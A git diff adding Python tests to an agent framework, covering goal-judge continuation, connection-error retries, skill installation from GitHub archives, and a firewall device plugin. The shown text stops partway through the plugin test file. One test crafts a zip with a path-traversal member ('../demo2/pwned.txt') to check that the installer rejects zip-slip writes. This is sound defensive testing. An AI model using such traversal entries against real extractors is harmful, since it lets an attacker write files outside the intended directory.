+    provider = SimpleNamespace(chat=AsyncMock(side_effect=RuntimeError("judge unavailable")))  # chat() raises RuntimeError when awaited.
+
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "Implemented the feature and tests passed.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+
+    provider.chat.assert_awaited_once()  # A single attempt is expected.
+    assert decision.verdict == "waiting"
+    assert decision.should_continue is False
+    assert decision.reason == "goal judge failed; waiting instead of continuing autonomously"
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_skips_model_judge_when_waiting_for_user_input():  # With pending_user_input=True, chat() is never awaited even though provider/model ids are given.
+    session_id = "goal_model_judge_pending_input_session"
+    await GoalManager.set_goal(session_id, "finish implementation")
+    provider = SimpleNamespace(chat=AsyncMock())  # No canned reply: chat() is expected not to be called.
+
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "Please provide more input.",
+            pending_user_input=True,
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+
+    provider.chat.assert_not_awaited()
+    assert decision.verdict == "waiting"
+    assert decision.should_continue is False
diff --git a/tests/session/test_retry.py b/tests/session/test_retry.py
index 09bf3c61f..fcc63b7ee 100644
--- a/tests/session/test_retry.py
+++ b/tests/session/test_retry.py
@@ -94,6 +94,15 @@ def test_string_message_timeout_pattern(self):
         result = SessionRetry.retryable(error)
         assert result is not None
 
+    def test_string_message_connection_error_pattern(self):  # An APIConnectionError dict with message "Connection error." is retryable and flagged as a connection error.
+        error = {
+            "name": "APIConnectionError",
+            "data": {"message": "Connection error."},
+        }
+        result = SessionRetry.retryable(error)
+        assert result is not None  # The test only requires a non-None result for this error.
+        assert SessionRetry.is_connection_error(error) is True
+
     def test_empty_error_returns_none(self):
         assert SessionRetry.retryable({}) is None
 
diff --git a/tests/session/test_runner_step.py b/tests/session/test_runner_step.py
index a14d5c109..cbfb5571b 100644
--- a/tests/session/test_runner_step.py
+++ b/tests/session/test_runner_step.py
@@ -251,6 +251,14 @@ def test_timeout_exception_is_retryable(self):
         result = runner._exception_to_error_dict(exc)
         assert result["data"]["isRetryable"] is True
 
+    def test_connection_error_exception_is_retryable(self):  # A plain Exception("Connection error.") becomes a retryable APIError dict with the connection-error display message.
+        runner = _make_runner()
+        exc = Exception("Connection error.")
+        result = runner._exception_to_error_dict(exc)
+        assert result["name"] == "APIError"
+        assert result["data"]["isRetryable"] is True
+        assert result["data"]["displayMessage"] == runner_mod.CONNECTION_ERROR_DISPLAY_MESSAGE  # Display text comes from the runner module constant.
+
     def test_exception_with_status_code_429(self):
         runner = _make_runner()
         exc = Exception("Rate limited")
@@ -2212,6 +2220,60 @@ async def fake_to_chat_messages(_messages, _system_prompts):  # noqa: ANN001
     assert result.content == "done"
 
 
+@pytest.mark.asyncio
+async def test_process_step_limits_connection_error_retries(monkeypatch):  # When every LLM call raises a connection error, _process_step stops after a fixed number of calls and reports the error.
+    runner = _make_runner("ses_runner_connection_error")
+    runner.callbacks = RunnerCallbacks(on_error=AsyncMock())  # on_error is mocked so its final call can be asserted.
+
+    last_user = UserMessageInfo(
+        id="msg_user_connection_error",
+        sessionID=runner.session.id,
+        role="user",
+        time={"created": 1_000},
+        agent="rex",
+        model={"providerID": "bailian", "modelID": "deepseek-v4-flash"},
+    )
+    agent = SimpleNamespace(name="rex", steps=None, mode="primary", prompt="", tools=[])
+    provider = MagicMock()
+    provider.is_configured.return_value = True
+    assistant_msg = SimpleNamespace(id="msg_assistant_connection_error")
+    update_mock = AsyncMock(return_value=None)
+    call_count = 0
+
+    async def fake_call_llm(*_args, **_kwargs):  # Counts invocations and always raises a connection error.
+        nonlocal call_count
+        call_count += 1
+        raise Exception("Connection error.")
+
+    monkeypatch.setattr(runner_mod.Agent, "get", AsyncMock(return_value=agent))
+    monkeypatch.setattr(runner_mod.Provider, "get", lambda provider_id: provider)
+    monkeypatch.setattr(runner_mod.Provider, "apply_config", AsyncMock(return_value=None))
+    monkeypatch.setattr(runner_mod.SessionPrompt, "build_system_prompts", AsyncMock(return_value=[]))
+    monkeypatch.setattr(runner, "_build_callable_tool_schema", AsyncMock(return_value=[]))
+    monkeypatch.setattr(
+        runner,
+        "_to_chat_messages",
+        AsyncMock(return_value=[SimpleNamespace(role="user", content="hi")]),
+    )
+    monkeypatch.setattr(runner_mod.Message, "get_text_content", AsyncMock(return_value="hi"))
+    monkeypatch.setattr(runner_mod.Message, "create", AsyncMock(return_value=assistant_msg))
+    monkeypatch.setattr(runner_mod.Message, "update", update_mock)
+    monkeypatch.setattr(runner_mod.SessionRetry, "sleep", AsyncMock(return_value=None))  # sleep becomes a no-op mock; presumably avoids real retry delays.
+    monkeypatch.setattr(runner, "_call_llm", fake_call_llm)
+
+    result = await runner._process_step([last_user], last_user)
+
+    assert call_count == 4  # NOTE(review): presumably one initial attempt plus three retries; confirm against the runner's retry limit.
+    assert result.action == "stop"
+    assert result.error == runner_mod.CONNECTION_ERROR_DISPLAY_MESSAGE
+    runner.callbacks.on_error.assert_awaited_with(runner_mod.CONNECTION_ERROR_DISPLAY_MESSAGE)
+
+    final_update = update_mock.await_args_list[-1].kwargs  # Keyword arguments of the last Message.update call.
+    assert final_update["finish"] == "error"
+    assert final_update["error"]["data"]["message"] == "Connection error."  # The raw exception text is kept alongside the display message.
+    assert final_update["error"]["data"]["displayMessage"] == runner_mod.CONNECTION_ERROR_DISPLAY_MESSAGE
+
+
 @pytest.mark.asyncio
 async def test_process_step_marks_aborted_llm_message_as_error(monkeypatch):
     runner = _make_runner("ses_runner_aborted_result")
diff --git a/tests/session/test_session_abort_inject.py b/tests/session/test_session_abort_inject.py
index ab3e06b9c..0f3138b1a 100644
--- a/tests/session/test_session_abort_inject.py
+++ b/tests/session/test_session_abort_inject.py
@@ -15,6 +15,7 @@
 import pytest
 
 from flocks.session.message import ToolPart, ToolStateCompleted
+from flocks.session.goal import GoalDecision
 from flocks.session.session_loop import SessionLoop, LoopCallbacks, LoopContext, LoopResult
 from flocks.session.runner import SessionRunner, StepResult
 from flocks.session.session import SessionInfo
@@ -356,6 +357,257 @@ def _make_msg(msg_id: str, role: str, finish: str = None, *, tokens=None, summar
         msg.summary = summary
         return msg
 
+    @pytest.mark.asyncio
+    async def test_run_loop_continues_for_active_goal_after_stop(self):  # A goal decision with should_continue=True creates a synthetic user message and a second turn runs.
+        session = SimpleNamespace(
+            id="turn_goal_session",
+            agent="rex",
+            directory="/tmp",
+            memory_enabled=False,
+        )
+        ctx = LoopContext(
+            session=session,
+            provider_id="test-provider",
+            model_id="test-model",
+            agent_name="rex",
+        )
+        user = self._make_msg("msg_001", "user")
+        assistant = self._make_msg("msg_002", "assistant", finish="stop")
+        goal_user = self._make_msg("msg_003", "user")
+        assistant_after_goal = self._make_msg("msg_004", "assistant", finish="stop")
+        ctx.session_ctx = SimpleNamespace(
+            get_messages=AsyncMock(side_effect=[  # Successive message lists, one per get_messages call.
+                [user],
+                [user, assistant],
+                [user, assistant, goal_user],
+                [user, assistant, goal_user, assistant_after_goal],
+            ])
+        )
+        event_callback = AsyncMock()
+        callbacks = LoopCallbacks(event_publish_callback=event_callback)
+        goal_decisions = [  # First decision requests continuation; the second (status "completed", verdict "inactive") does not.
+            GoalDecision(
+                status="active",
+                verdict="continue",
+                should_continue=True,
+                continuation_prompt="continue toward goal",
+                reason="not done",
+            ),
+            GoalDecision(status="completed", verdict="inactive"),
+        ]
+
+        with patch(
+            "flocks.session.session_loop.Provider.resolve_model_info",
+            return_value=(0, 0, None),
+        ), patch(
+            "flocks.session.session_loop.Message.parts",
+            AsyncMock(return_value=[]),
+        ), patch(
+            "flocks.session.session_loop.Message.get_text_content",
+            MagicMock(return_value="still working"),
+        ), patch(
+            "flocks.session.session_loop.Message.create",
+            AsyncMock(return_value=goal_user),
+        ) as create_message, patch(
+            "flocks.session.session_loop.GoalManager.evaluate_after_turn",
+            AsyncMock(side_effect=goal_decisions),
+        ), patch(
+            "flocks.session.runner.SessionRunner._process_step",
+            AsyncMock(side_effect=[StepResult(action="stop"), StepResult(action="stop")]),  # Both steps end with action "stop".
+        ):
+            result = await SessionLoop._run_loop(ctx, callbacks)
+
+        assert result.action == "stop"
+        create_message.assert_awaited_once()  # Exactly one continuation message is created.
+        assert create_message.await_args.kwargs["content"] == "continue toward goal"
+        assert create_message.await_args.kwargs["synthetic"] is True
+        assert create_message.await_args.kwargs["part_metadata"]["goalContinuation"] is True
+        event_names = [call.args[0] for call in event_callback.await_args_list]  # First positional arg of each published event.
+        assert event_names == [
+            "turn.started",
+            "turn.continued",
+            "turn.started",
+            "turn.stopped",
+        ]
+        continued_payload = event_callback.await_args_list[1].args[1]  # Index 1 is the "turn.continued" event per the order asserted above.
+        assert continued_payload["continue_reason"] == "goal"
+        assert continued_payload["goalMessageID"] == goal_user.id
+
+    @pytest.mark.asyncio
+    async def test_run_loop_waits_for_user_input_after_goal_clarification(self):  # A "waiting" goal decision ends the loop and no continuation message is created.
+        session = SimpleNamespace(
+            id="turn_goal_waiting_session",
+            agent="rex",
+            directory="/tmp",
+            memory_enabled=False,
+        )
+        ctx = LoopContext(
+            session=session,
+            provider_id="test-provider",
+            model_id="test-model",
+            agent_name="rex",
+        )
+        user = self._make_msg("msg_001", "user")
+        assistant = self._make_msg("msg_002", "assistant", finish="stop")
+        ctx.session_ctx = SimpleNamespace(
+            get_messages=AsyncMock(side_effect=[  # Successive message lists, one per get_messages call.
+                [user],
+                [user, assistant],
+            ])
+        )
+        event_callback = AsyncMock()
+        callbacks = LoopCallbacks(event_publish_callback=event_callback)
+
+        with patch(
+            "flocks.session.session_loop.Provider.resolve_model_info",
+            return_value=(0, 0, None),
+        ), patch(
+            "flocks.session.session_loop.Message.parts",
+            AsyncMock(return_value=[]),
+        ), patch(
+            "flocks.session.session_loop.Message.get_text_content",
+            MagicMock(return_value="Please clarify what tests to write."),
+        ), patch(
+            "flocks.session.session_loop.Message.create",
+            AsyncMock(),
+        ) as create_message, patch(
+            "flocks.session.session_loop.GoalManager.evaluate_after_turn",
+            AsyncMock(return_value=GoalDecision(  # Canned decision: goal still active, waiting, do not continue.
+                status="active",
+                verdict="waiting",
+                should_continue=False,
+                reason="waiting for user clarification",
+            )),
+        ), patch(
+            "flocks.session.runner.SessionRunner._process_step",
+            AsyncMock(return_value=StepResult(action="stop")),
+        ):
+            result = await SessionLoop._run_loop(ctx, callbacks)
+
+        assert result.action == "stop"
+        create_message.assert_not_awaited()
+        event_names = [call.args[0] for call in event_callback.await_args_list]  # First positional arg of each published event.
+        assert event_names == ["turn.started", "turn.stopped"]  # No "turn.continued" event is published.
+
+    @pytest.mark.asyncio
+    async def test_run_loop_passes_pending_question_to_goal_judge(self):  # When has_pending_questions returns True, evaluate_after_turn is called with pending_user_input=True.
+        session = SimpleNamespace(
+            id="turn_goal_pending_question_session",
+            agent="rex",
+            directory="/tmp",
+            memory_enabled=False,
+        )
+        ctx = LoopContext(
+            session=session,
+            provider_id="test-provider",
+            model_id="test-model",
+            agent_name="rex",
+        )
+        user = self._make_msg("msg_001", "user")
+        assistant = self._make_msg("msg_002", "assistant", finish="stop")
+        ctx.session_ctx = SimpleNamespace(
+            get_messages=AsyncMock(side_effect=[  # Successive message lists, one per get_messages call.
+                [user],
+                [user, assistant],
+            ])
+        )
+        event_callback = AsyncMock()
+        callbacks = LoopCallbacks(event_publish_callback=event_callback)
+        evaluate_goal = AsyncMock(return_value=GoalDecision(  # Kept in a variable so its call kwargs can be inspected below.
+            status="active",
+            verdict="waiting",
+            should_continue=False,
+            reason="session has a pending user question",
+        ))
+
+        with patch(
+            "flocks.session.session_loop.Provider.resolve_model_info",
+            return_value=(0, 0, None),
+        ), patch(
+            "flocks.session.session_loop.Message.parts",
+            AsyncMock(return_value=[]),
+        ), patch(
+            "flocks.session.session_loop.Message.get_text_content",
+            MagicMock(return_value="Please provide the input."),
+        ), patch(
+            "flocks.server.routes.question.has_pending_questions",  # Patched in its defining module rather than in session_loop.
+            MagicMock(return_value=True),
+        ), patch(
+            "flocks.session.session_loop.Message.create",
+            AsyncMock(),
+        ) as create_message, patch(
+            "flocks.session.session_loop.GoalManager.evaluate_after_turn",
+            evaluate_goal,
+        ), patch(
+            "flocks.session.runner.SessionRunner._process_step",
+            AsyncMock(return_value=StepResult(action="stop")),
+        ):
+            result = await SessionLoop._run_loop(ctx, callbacks)
+
+        assert result.action == "stop"
+        create_message.assert_not_awaited()
+        assert evaluate_goal.await_args.kwargs["pending_user_input"] is True  # The flag is passed as a keyword argument.
+        event_names = [call.args[0] for call in event_callback.await_args_list]
+        assert event_names == ["turn.started", "turn.stopped"]
+
+    @pytest.mark.asyncio
+    async def test_run_loop_publishes_goal_terminal_status(self):  # A "completed" goal decision publishes session.goal.updated between turn.started and turn.stopped.
+        session = SimpleNamespace(
+            id="turn_goal_done_session",
+            agent="rex",
+            directory="/tmp",
+            memory_enabled=False,
+        )
+        ctx = LoopContext(
+            session=session,
+            provider_id="test-provider",
+            model_id="test-model",
+            agent_name="rex",
+        )
+        messages = [
+            self._make_msg("msg_001", "user"),
+            self._make_msg("msg_002", "assistant", finish="stop"),
+        ]
+        ctx.session_ctx = SimpleNamespace(
+            get_messages=AsyncMock(side_effect=[[messages[0]], messages])  # First call returns only the user message, second returns both.
+        )
+        event_callback = AsyncMock()
+        callbacks = LoopCallbacks(event_publish_callback=event_callback)
+
+        with patch(
+            "flocks.session.session_loop.Provider.resolve_model_info",
+            return_value=(0, 0, None),
+        ), patch(
+            "flocks.session.session_loop.Message.parts",
+            AsyncMock(return_value=[]),
+        ), patch(
+            "flocks.session.session_loop.Message.get_text_content",
+            MagicMock(return_value="Goal complete: done"),
+        ), patch(
+            "flocks.session.session_loop.GoalManager.evaluate_after_turn",
+            AsyncMock(return_value=GoalDecision(  # Canned terminal decision; should_continue is left at its default.
+                status="completed",
+                verdict="complete",
+                reason="Goal complete: done",
+                objective="finish work",
+            )),
+        ), patch(
+            "flocks.session.runner.SessionRunner._process_step",
+            AsyncMock(return_value=StepResult(action="stop")),
+        ):
+            result = await SessionLoop._run_loop(ctx, callbacks)
+
+        assert result.action == "stop"
+        event_names = [call.args[0] for call in event_callback.await_args_list]  # First positional arg of each published event.
+        assert event_names == ["turn.started", "session.goal.updated", "turn.stopped"]
+        goal_payload = event_callback.await_args_list[1].args[1]  # Index 1 is the session.goal.updated event per the order asserted above.
+        assert goal_payload == {
+            "sessionID": session.id,
+            "status": "completed",
+            "objective": "finish work",
+            "reason": "Goal complete: done",
+        }
+
     @pytest.mark.asyncio
     async def test_pre_compact_cleanup_emits_turn_continued_before_next_iteration(self):
         session = SimpleNamespace(
diff --git a/tests/skill/test_installer.py b/tests/skill/test_installer.py
index d8f7a87e5..1420745e3 100644
--- a/tests/skill/test_installer.py
+++ b/tests/skill/test_installer.py
@@ -2,9 +2,12 @@
 Tests for flocks.skill.installer and eligibility checking.
 """
 
+import asyncio
 import os
 import shutil
 import tempfile
+import io
+import zipfile
 from pathlib import Path
 from unittest.mock import AsyncMock, MagicMock, patch
 
@@ -311,6 +314,37 @@ async def fake_create_subprocess_exec(*_cmd, **kwargs):
         assert result.skill_name == "demo"
         assert (tmp_skills_dir / "demo" / "SKILL.md").exists()
 
+    @pytest.mark.asyncio
+    async def test_skills_sh_cli_timeout_returns_error(self):  # A TimeoutError from _run_subprocess yields a failed result whose error mentions "timed out".
+        with (
+            patch("flocks.skill.installer.shutil.which", return_value="/usr/bin/npx"),  # shutil.which always returns an npx path.
+            patch.object(
+                SkillInstaller,
+                "_run_subprocess",
+                AsyncMock(side_effect=TimeoutError("Command timed out after 45s")),
+            ),
+        ):
+            result = await SkillInstaller._install_from_skills_sh_cli(
+                "owner/repo/demo",
+                "global",
+                yes=True,
+            )
+
+        assert result.success is False
+        assert "timed out" in (result.error or "").lower()  # "or ''" guards against error being None.
+
+    @pytest.mark.asyncio
+    async def test_install_from_source_overall_timeout_returns_error(self):  # An asyncio.TimeoutError from asyncio.wait_for yields a failed result whose error mentions "timed out".
+        async def fake_wait_for(awaitable, timeout):  # Replacement for asyncio.wait_for that always times out.
+            awaitable.close()  # Assumes a coroutine object; closing it presumably avoids a "never awaited" warning - confirm.
+            raise asyncio.TimeoutError()
+
+        with patch("flocks.skill.installer.asyncio.wait_for", fake_wait_for):
+            result = await SkillInstaller.install_from_source("github:owner/repo/demo")
+
+        assert result.success is False
+        assert "timed out" in (result.error or "").lower()  # "or ''" guards against error being None.
+
     @pytest.mark.asyncio
     async def test_safeskill_requires_npx(self, tmp_skills_dir):
         with patch("flocks.skill.installer.shutil.which", return_value=None):
@@ -435,6 +469,110 @@ async def get(self, url: str):
         assert "raw GitHub SKILL.md fallback" in result.message
         assert (tmp_skills_dir / "web-design-guidelines" / "SKILL.md").exists()
 
+    @pytest.mark.asyncio
+    async def test_github_archive_fallback_finds_skill_by_name(self, tmp_skills_dir: Path):  # A skill nested inside the downloaded zip is installed by name, along with its extra files.
+        skill_content = (
+            "---\n"
+            "name: improve-codebase-architecture\n"
+            "description: Improve codebase architecture\n"
+            "---\n"
+            "# Improve Codebase Architecture\n"
+        )
+        zip_buffer = io.BytesIO()  # In-memory zip that stands in for the downloaded archive.
+        with zipfile.ZipFile(zip_buffer, "w") as zf:
+            zf.writestr(
+                "skills-main/skills/engineering/improve-codebase-architecture/SKILL.md",
+                skill_content,
+            )
+            zf.writestr(
+                "skills-main/skills/engineering/improve-codebase-architecture/references/checklist.md",
+                "checklist",
+            )
+
+        class Resp:  # Minimal response stand-in: status_code, text, content and json().
+            def __init__(self, status_code: int, text: str = "", content: bytes = b""):
+                self.status_code = status_code
+                self.text = text
+                self.content = content
+
+            def json(self):
+                return []
+
+        class Client:  # Async context manager stub whose get() succeeds only for codeload.github.com URLs.
+            async def __aenter__(self):
+                return self
+
+            async def __aexit__(self, *_args):
+                return None
+
+            async def get(self, url: str):
+                if "codeload.github.com" in url:
+                    return Resp(200, content=zip_buffer.getvalue())
+                return Resp(404, "not found")  # Every other URL returns 404.
+
+        with (
+            patch("flocks.skill.installer._user_skills_root", return_value=tmp_skills_dir),
+            patch("httpx.AsyncClient", return_value=Client()),
+        ):
+            result = await SkillInstaller.install_from_source(
+                "github:mattpocock/skills/improve-codebase-architecture"
+            )
+
+        assert result.success is True
+        assert result.skill_name == "improve-codebase-architecture"
+        assert "GitHub archive" in result.message
+        assert (  # The non-SKILL.md file from the archive must be installed too.
+            tmp_skills_dir
+            / "improve-codebase-architecture"
+            / "references"
+            / "checklist.md"
+        ).exists()
+
+    @pytest.mark.asyncio
+    async def test_github_archive_fallback_rejects_zip_slip_members(self, tmp_skills_dir: Path):  # An archive member with ".." in its path must not be written outside the skill directory.
+        skill_content = (
+            "---\n"
+            "name: demo\n"
+            "description: Demo skill\n"
+            "---\n"
+            "# Demo\n"
+        )
+        zip_buffer = io.BytesIO()  # In-memory zip that stands in for the downloaded archive.
+        with zipfile.ZipFile(zip_buffer, "w") as zf:
+            zf.writestr("repo-main/demo/SKILL.md", skill_content)
+            zf.writestr("repo-main/demo/../demo2/pwned.txt", "pwned")  # Traversal member that points at a sibling "demo2" directory.
+
+        class Resp:  # Minimal response stand-in: status_code, text, content and json().
+            def __init__(self, status_code: int, text: str = "", content: bytes = b""):
+                self.status_code = status_code
+                self.text = text
+                self.content = content
+
+            def json(self):
+                return []
+
+        class Client:  # Async context manager stub whose get() succeeds only for codeload.github.com URLs.
+            async def __aenter__(self):
+                return self
+
+            async def __aexit__(self, *_args):
+                return None
+
+            async def get(self, url: str):
+                if "codeload.github.com" in url:
+                    return Resp(200, content=zip_buffer.getvalue())
+                return Resp(404, "not found")
+
+        with (
+            patch("flocks.skill.installer._user_skills_root", return_value=tmp_skills_dir),
+            patch("httpx.AsyncClient", return_value=Client()),
+        ):
+            result = await SkillInstaller.install_from_source("github:owner/repo/demo")
+
+        assert result.success is True  # The install still succeeds.
+        assert (tmp_skills_dir / "demo" / "SKILL.md").exists()
+        assert not (tmp_skills_dir / "demo2" / "pwned.txt").exists()  # The traversal target must not exist.
+
 
 # ---------------------------------------------------------------------------
 # SkillInstaller._build_install_command
diff --git a/tests/skill/test_skill.py b/tests/skill/test_skill.py
index 58860c807..e704e785e 100644
--- a/tests/skill/test_skill.py
+++ b/tests/skill/test_skill.py
@@ -90,6 +90,26 @@ def test_parse_skill_with_frontmatter():
         assert skill_info.description == "Skill with frontmatter"
 
 
+def test_parse_skill_md_with_ui_hidden_flag(tmp_path):
+    """SKILL.md can opt out of user-facing skill UI with ui_hidden: true."""
+    skill_dir = tmp_path / "ui-hidden-skill"  # Skill directory created under the tmp_path argument.
+    skill_dir.mkdir()
+    skill_file = skill_dir / "SKILL.md"
+    skill_file.write_text("""---
+name: ui-hidden-skill
+description: UI-hidden internal skill
+ui_hidden: true
+---
+
+# UI Hidden Skill
+""")
+
+    skill_info = Skill._parse_skill_md(str(skill_file))  # The parser is given the path as a string.
+
+    assert skill_info is not None
+    assert skill_info.ui_hidden is True  # The frontmatter flag is exposed as a boolean attribute.
+
+
 @pytest.mark.asyncio
 async def test_discover_skills():
     """Test skill discovery"""
diff --git a/tests/skill/test_workflow_config_guide_skill.py b/tests/skill/test_workflow_config_guide_skill.py
new file mode 100644
index 000000000..46697a8cf
--- /dev/null
+++ b/tests/skill/test_workflow_config_guide_skill.py
@@ -0,0 +1,100 @@
+import json
+from pathlib import Path
+
+import pytest
+
+from flocks.skill.skill import Skill
+
+
+PROJECT_ROOT = Path(__file__).resolve().parents[2]
+
+
+def test_parse_workflow_config_guide_project_skill() -> None:
+    skill_file = (
+        PROJECT_ROOT
+        / ".flocks"
+        / "plugins"
+        / "skills"
+        / "workflow-config-guide"
+        / "SKILL.md"
+    )
+
+    parsed = Skill._parse_skill_md(str(skill_file))
+
+    assert parsed is not None
+    assert parsed.name == "workflow-config-guide"
+    assert parsed.category == "system"
+    assert parsed.ui_hidden is True
+    assert "配置现有 Flocks 工作流" in parsed.description
+
+
+def test_workflow_config_guide_requires_free_text_question_input() -> None:
+    skill_file = (
+        PROJECT_ROOT
+        / ".flocks"
+        / "plugins"
+        / "skills"
+        / "workflow-config-guide"
+        / "SKILL.md"
+    )
+
+    content = skill_file.read_text(encoding="utf-8")
+
+    assert "never make a configuration question choice-only" in content
+    assert 'type: "text"' in content
+    assert "Custom value or notes" in content
+
+
+def test_workflow_builder_references_template_inside_skill() -> None:
+    skill_file = (
+        PROJECT_ROOT
+        / ".flocks"
+        / "plugins"
+        / "skills"
+        / "workflow-builder"
+        / "SKILL.md"
+    )
+
+    content = skill_file.read_text(encoding="utf-8")
+
+    assert "references/workflow_template/" in content
+    assert ".flocks/plugins/workflows/workflow_template" not in content
+
+
+@pytest.mark.asyncio
+async def test_discover_workflow_config_guide_project_skill() -> None:
+    skills = await Skill.refresh()
+    skill_names = {skill.name for skill in skills}
+
+    assert "workflow-config-guide" in skill_names
+
+
+def test_workflow_template_no_longer_ships_integration_guide() -> None:
+    old_workflow_template = (
+        PROJECT_ROOT
+        / ".flocks"
+        / "plugins"
+        / "workflows"
+        / "workflow_template"
+    )
+    workflow_builder_template = (
+        PROJECT_ROOT
+        / ".flocks"
+        / "plugins"
+        / "skills"
+        / "workflow-builder"
+        / "references"
+        / "workflow_template"
+    )
+
+    assert not old_workflow_template.exists()
+    assert (workflow_builder_template / "workflow.md").exists()
+    assert (workflow_builder_template / "workflow.json").exists()
+    assert (workflow_builder_template / "config.json").exists()
+    assert (workflow_builder_template / "guide.md").exists()
+
+    config = json.loads((workflow_builder_template / "config.json").read_text(encoding="utf-8"))
+    assert config["kind"] == "workflow.integration-config"
+    assert isinstance(config["publish"], dict)
+    assert isinstance(config["triggers"], list)
+    assert "publishTemplates" not in config
diff --git a/tests/tool/test_360_fw_device_plugin.py b/tests/tool/test_360_fw_device_plugin.py
new file mode 100644
index 000000000..6892b273e
--- /dev/null
+++ b/tests/tool/test_360_fw_device_plugin.py
@@ -0,0 +1,307 @@
+from __future__ import annotations
+
+import importlib.util
+import shutil
+from pathlib import Path
+from types import SimpleNamespace
+from typing import Any
+
+import pytest
+import yaml
+
+from flocks.config.api_versioning import derive_storage_key
+from flocks.tool.registry import ToolContext, ToolResult
+from flocks.tool.tool_loader import yaml_to_tool
+
+
+_ROOT = Path(__file__).resolve().parents[2]
+_PLUGIN_DIR = _ROOT / ".flocks" / "flockshub" / "plugins" / "tools" / "device" / "360_fw_v5_5"
+_HANDLER_PATH = _PLUGIN_DIR / "360_fw.handler.py"
+
+
+def _installed_plugin_dir(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> Path:
+    project_root = tmp_path / "project"
+    install_dir = project_root / ".flocks" / "plugins" / "tools" / "device" / "360_fw_v5_5"
+    shutil.copytree(_PLUGIN_DIR, install_dir)
+    monkeypatch.chdir(project_root)
+    return install_dir
+
+
+def _load_handler():
+    spec = importlib.util.spec_from_file_location("_test_360_fw_handler", _HANDLER_PATH)
+    assert spec is not None
+    assert spec.loader is not None
+    module = importlib.util.module_from_spec(spec)
+    spec.loader.exec_module(module)
+    return module
+
+
+def test_provider_metadata_declares_360_fw_v5_5_device_plugin():
+    raw = yaml.safe_load((_PLUGIN_DIR / "_provider.yaml").read_text(encoding="utf-8"))
+
+    assert raw["name"] == "360_fw"
+    assert raw["service_id"] == "360_fw"
+    assert raw["version"] == "5.5"
+    assert raw["integration_type"] == "device"
+    assert raw["description_cn"]
+    assert derive_storage_key(raw["service_id"], raw["version"]) == "360_fw_v5_5"
+    assert raw["defaults"]["product_version"] == "5.5"
+    assert raw["defaults"]["fw_software_version"] == "V5.5"
+    assert raw["defaults"]["version_software"] == "V5.5R605P000B20240625"
+    assert "allow_mutation" not in raw["defaults"]
+    assert "allow_dangerous_ops" not in raw["defaults"]
+
+    credential_keys = {field["key"] for field in raw["credential_fields"]}
+    assert {"base_url", "username", "password"} <= credential_keys
+    secret_ids = {field.get("secret_id") for field in raw["credential_fields"]}
+    assert {"360_fw_v5_5_username", "360_fw_v5_5_password"} <= secret_ids
+
+
+def test_probe_manifest_declares_connectivity_and_fixtures():
+    raw = yaml.safe_load((_PLUGIN_DIR / "_test.yaml").read_text(encoding="utf-8"))
+
+    assert raw["connectivity"]["tool"] == "360_fw_system"
+    assert raw["connectivity"]["params"] == {"action": "fw_check_login"}
+
+    expected_tools = {
+        "360_fw_system",
+        "360_fw_objects",
+        "360_fw_policy",
+        "360_fw_network",
+        "360_fw_vpn_bgp",
+        "360_fw_auth_security",
+        "360_fw_observability",
+        "360_fw_api_readonly",
+        "360_fw_api_mutation",
+    }
+    for tool_name in expected_tools:
+        assert raw["fixtures"][tool_name], tool_name
+
+
+@pytest.mark.parametrize(
+    ("yaml_name", "function_name", "requires_confirmation"),
+    [
+        ("360_fw_system.yaml", "system", False),
+        ("360_fw_objects.yaml", "objects", True),
+        ("360_fw_policy.yaml", "policy", True),
+        ("360_fw_network.yaml", "network", True),
+        ("360_fw_vpn_bgp.yaml", "vpn_bgp", True),
+        ("360_fw_auth_security.yaml", "auth_security", True),
+        ("360_fw_observability.yaml", "observability", False),
+        ("360_fw_api_readonly.yaml", "api_readonly", False),
+        ("360_fw_api_mutation.yaml", "api_mutation", True),
+    ],
+)
+def test_group_manifest_loads_as_device_tool(
+    yaml_name: str,
+    function_name: str,
+    requires_confirmation: bool,
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+):
+    install_dir = _installed_plugin_dir(tmp_path, monkeypatch)
+    yaml_path = install_dir / yaml_name
+    raw = yaml.safe_load(yaml_path.read_text(encoding="utf-8"))
+    tool = yaml_to_tool(raw, yaml_path)
+
+    assert tool.info.provider == "360_fw_v5_5"
+    assert tool.info.source == "device"
+    assert tool.info.provider_version == "5.5"
+    assert raw["provider"] == "360_fw"
+    assert raw["handler"]["script_file"] == "360_fw.handler.py"
+    assert raw["handler"]["function"] == function_name
+    assert raw["requires_confirmation"] is requires_confirmation
+    assert "action" in raw["inputSchema"]["required"]
+    assert raw["inputSchema"]["properties"]["action"]["enum"]
+
+
+def test_runtime_config_resolves_configwriter_and_secret_refs(monkeypatch):
+    handler = _load_handler()
+    raw_service = {
+        "base_url": "https://fw.example.com/API/",
+        "username": "{secret:360_fw_v5_5_username}",
+        "password": "{secret:360_fw_v5_5_password}",
+        "timeout": "12",
+        "verify_ssl": "true",
+    }
+    secrets = {
+        "360_fw_v5_5_username": "admin",
+        "360_fw_v5_5_password": "pass",
+    }
+
+    monkeypatch.setattr(
+        handler.ConfigWriter,
+        "get_api_service_raw",
+        staticmethod(lambda service_id: raw_service if service_id == "360_fw" else None),
+    )
+    monkeypatch.setattr(handler, "get_secret_manager", lambda: SimpleNamespace(get=secrets.get))
+
+    config = handler._load_runtime_config()
+
+    assert config.base_url == "https://fw.example.com/API"
+    assert config.username == "admin"
+    assert config.password == "pass"
+    assert config.timeout == 12
+    assert config.verify_ssl is True
+
+
+def test_client_cache_key_does_not_store_plaintext_password():
+    handler = _load_handler()
+    config = handler.RuntimeConfig(
+        base_url="https://fw.example.com/API",
+        username="admin",
+        password="secret-password",
+        verify_ssl=False,
+        timeout=30,
+    )
+
+    key = handler._client_cache_key(config)
+
+    assert "secret-password" not in key
+    assert key == ("https://fw.example.com/API", "admin", False)
+
+
+def test_login_uses_user_pwd_and_raw_authorization_header():
+    handler = _load_handler()
+    config = handler.RuntimeConfig(
+        base_url="https://fw.example.com/API",
+        username="admin",
+        password="secret",
+        verify_ssl=False,
+        timeout=30,
+    )
+    client = handler.FwClient(config)
+    calls: list[tuple[str, str, dict[str, Any] | None, Any]] = []
+
+    class _Response:
+        status_code = 200
